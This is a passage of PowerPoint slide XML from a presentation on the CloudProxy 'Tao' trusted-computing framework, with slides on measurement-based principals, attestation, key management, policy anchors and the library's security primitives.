              <a:rPr lang="en-US" sz="4400" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>application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83</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Content Placeholder 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="297870" y="1842846"/>
            <a:ext cx="579813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Write the programs implementing the application correctly</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Deploy the program safely (no changes)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Configure the operating environment correctly</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Ensure other programs can’t (or don’t) interfere with safe program execution </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Generate and deploy keys safely</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Protect keys during use and storage</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Ensure data is not visible to adversaries and cannot be changed in transmission or storage</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Add new program elements during operation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Ensure trust infrastructure is reliable </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Manually audit to provide confidence this all happened during operations</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="280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6989807" y="2586685"/>
            <a:ext cx="37338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Write the programs implementing the application correctly</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Content Placeholder 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="450270" y="1198607"/>
            <a:ext cx="3581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2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Currently</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Content Placeholder 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6989807" y="1519885"/>
            <a:ext cx="3581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2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>With CloudProxy</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Content Placeholder 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6837406" y="3785105"/>
            <a:ext cx="5195455" cy="2743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3366FF"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Properties</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPts val="280"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3366FF"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Fail safe </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3366FF"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>remotely </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3366FF"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>verifiable operation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPts val="280"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3366FF"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Simple programming model</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:spcBef>
                <a:spcPts val="280"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3366FF"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Support multiple layers of familiar software stack (Application, OS, Hypervisor, Hardware)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="12714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827903" y="228600"/>
            <a:ext cx="10330248" cy="838200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Secret sauce: the “Tao”</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84</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Content Placeholder 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="429491" y="1581665"/>
            <a:ext cx="11083636" cy="4697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Host – Hosted system paradigm</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Both measured</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Recursive</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Host system provides:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Isolation for measurement-based principals </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Hosted programs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="2" indent="-342900">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Services for measurement-based principals</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Restricted use of cryptographic keys to encrypt and decrypt secrets for a measurement-based principal</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Attestation for trust establishment</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Key management for the principals</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Policy enforcement anchor (authentication and authorization)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="9165999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8" y="271959"/>
            <a:ext cx="11883081" cy="912920"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Measurement-based Principals</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="485876" y="1735673"/>
            <a:ext cx="11430000" cy="4620677"/>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Measurement for executing hosted program includes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binary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parameters and other initial data</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host system and its ancestors</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Root host system is usually hardware</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Measurement Principals have descriptive, authenticated names and keys with public-private key-pairs that “speak for” them</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:endParaRPr lang="en-US"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600" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="Courier New" charset="0"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>Linux Tao Service (key([c096d85702a63ee1d350f80977163baf507272ed450ec6fc8a7a7837402bcaa1]).TrivialGuard("Liberal”)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750" algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="Courier New" charset="0"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>key([c096d85702a63ee1d350f80977163baf507272ed450ec6fc8a7a7837402bcaa1]).TrivialGuard("Liberal").Program([f4217096352bfe4508d1e2930373df748d35cee8f1efa44ac68d0bc973794063]).PolicyKey([b5548720ac9e56c0de44acbcc69c65 e1b6ac07a833eb297e4f846f643bfd7d4c]) </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{FA32F8ED-EEB4-4D51-9E8E-3B145D9B9811}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>85</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="21526241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205" y="286264"/>
            <a:ext cx="8229600" cy="838200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Policy anchor</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="593124" y="1878226"/>
            <a:ext cx="10790538" cy="4668795"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="457200" indent="-457200" algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Policy public key is part of measured principal</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Roots policy enforcement for activity</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All valid assertions chain to this key</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Key can’t be modified without changing principal</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Instant PKI</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Important for scalability</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No hardwired configuration</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No unverified actions</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Technicality: Can be included using an extension </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>mechanism.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{FA32F8ED-EEB4-4D51-9E8E-3B145D9B9811}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>86</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="29376228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784" y="311727"/>
            <a:ext cx="11437495" cy="838200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Key management</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="494676" y="1963711"/>
            <a:ext cx="11061142" cy="4740092"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="457200" indent="-4572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How do measurement-based principals get their keys?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Generate public-private key pair when first started on host system</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Host system “attests” to public key</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Signs attestation (certificate) with hosted system measurement and public key </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Attestation transmitted to “authority” who signs public key with hosted system measurement</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Certificate chain from hardware to hosted system is evidence for key</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Private keys protected by host system</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-4572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Only this principal has access to the corresponding private key when isolated.  Certificate chain is proof of key validity.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900" algn="l">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FA32F8ED-EEB4-4D51-9E8E-3B145D9B9811}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>87</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="30368581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752600" y="159327"/>
            <a:ext cx="8534400" cy="838200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>CloudProxy Tao Library</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88</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Content Placeholder 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="803566" y="1331162"/>
            <a:ext cx="10307782" cy="50984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Primitives</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Start measured isolated hosted program</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Seal/unseal secrets to program identity</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Generate, manage, certify keys via attestation keys (initialization)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Authenticate programs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Policy based authentication and authorization</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Program based root</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Claims, access guard</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Cryptographic authentication (signatures)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>End-point protected communications</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
